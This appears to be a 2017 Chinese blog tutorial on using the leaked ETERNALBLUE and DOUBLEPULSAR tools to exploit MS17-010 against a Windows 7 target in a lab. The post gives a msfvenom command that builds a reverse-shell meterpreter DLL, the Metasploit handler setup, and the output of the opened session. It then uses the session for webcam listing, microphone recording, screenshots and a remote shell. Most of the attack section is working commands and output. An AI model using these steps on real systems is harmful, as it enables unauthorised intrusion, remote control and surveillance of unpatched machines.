美文网首页Linux运维之路我用 Linux
ETERNALBLUE工具测试与MS17-010漏洞利用

ETERNALBLUE工具测试与MS17-010漏洞利用

作者: 聂扬帆博客 | 来源:发表于2017-05-02 14:15 被阅读545次

    最近一段时间网络又发生了一次大地震,Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,可以覆盖大量的 Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用。

    目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

    而Shadow Brokers也在推特上面放出了保留部分文件,下载地址:shadowbroker

    这次的文件有三个目录,分别为“Windows”、“Swift” 和 “OddJob”,包含一堆令人震撼的黑客工具。本文要写的就是利用ETERNALBLUE工具进行攻击。

    0x01 环境准备

    准备三台机器:两台攻击机器windows 7和kali,一台目标机器windows 7
    首先在攻击机器windows7中安装配置python和pywin32。

    1. python-2.6 32位 :python-2.6.6_x_32.msi 安装完成后并配置环境变量;
    2. pywin32 :pywin32-221.win-amd64-py2.6.exe
    3. 因为0day工具包里面代码的原因,需要在windows目录下新建一个listeningposts目录(不是c盘根目录的windows),空的就好,不需要再去注释文件。
      环境搭建好后,运行windows目录下的fb.py脚本,正常显示即可。

    0x02 漏洞利用

    1. 在kali下配置msf的payload:
    $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.30 LPORT=6666 -f dll > /opt/test.dll  
    ##LHOST为kali机器IP,命令生成dll文件保存在/opt路径下
    
    1. 把上面生成的dll文件放在windows攻击机器的C盘根目录下,
    2. 在kali中开启msfpaylod监听
    $ msfconsole
    msf > use exploit/multi/handler 
    msf exploit(handler) >set lhost 192.168.0.30
    msf exploit(handler) >set lport 6666
    msf exploit(handler) >set PAYLOAD windows/x64/meterpreter/reverse_tcp 
    msf exploit(handler) > exploit 
    [*] Started reverse handler on 172.16.0.30:6666 
    [*] Starting the payload handler...
    
    1. 在windows攻击机器上运行fb.py脚本


    2. 设置目标机器IP


    3. 创建一个新项目(如果是第一次运行是没有下图中的test项目的)


    4. 利用eternalblue漏洞


    5. Eternalblue配置(需要注意的几个配置如下图,其它一路回车)


    6. Eternalblue漏洞利用成功


    7. 利用Doublepulsar漏洞


    8. 配置Doublepulsar(除了下图中需要修改的地方,其它一路回车)



    9. 攻击成功
      当执行成功后,在kali机器界面就成功连接了目标机器,我们就可以在目标机器上查看文件,截图等等。按ctrl+z即可退出连接。
    [*] Started reverse handler on 192.168.0.30:6666 
    [*] Starting the payload handler... 
    [*] Sending stage (1105970 bytes) to 192.168.0.40
    [*] Meterpreter session 2 opened (192.168.0.30:6666->192.168.0.40:52187) at 2017-04-28 07:35:45 +0000 
    meterpreter >
    
    1. 桌面截图
    meterpreter > webcam_list    ##启动webcam录屏工具
    : Citrix HDX Web Camera
    meterpreter > record_mic    ##录制屏幕
    [*] Starting... 
    [*] Stopped
    Audio saved to: /usr/bin/tmshuzXf.wav    ##保存路径 
    meterpreter > screenshot    ##截图
    Screenshot saved to: /usr/bin/FgNesEUj.jpeg  ##保存路径 
    meterpreter >
    
    1. 进入机器查看文件
    meterpreter >shell  ##输入shell命令就可以进去目标机器了
    Process 924 created. 
    Channel 1 created.
    Microsoft Windows 7 
    C:\Windows\system32>cd c:\
    cd c:\
    c:\>
    

    博客地址:http://yangfannie.com

    相关文章

      网友评论

        本文标题:ETERNALBLUE工具测试与MS17-010漏洞利用

        本文链接:https://www.haomeiwen.com/subject/yqvctxtx.html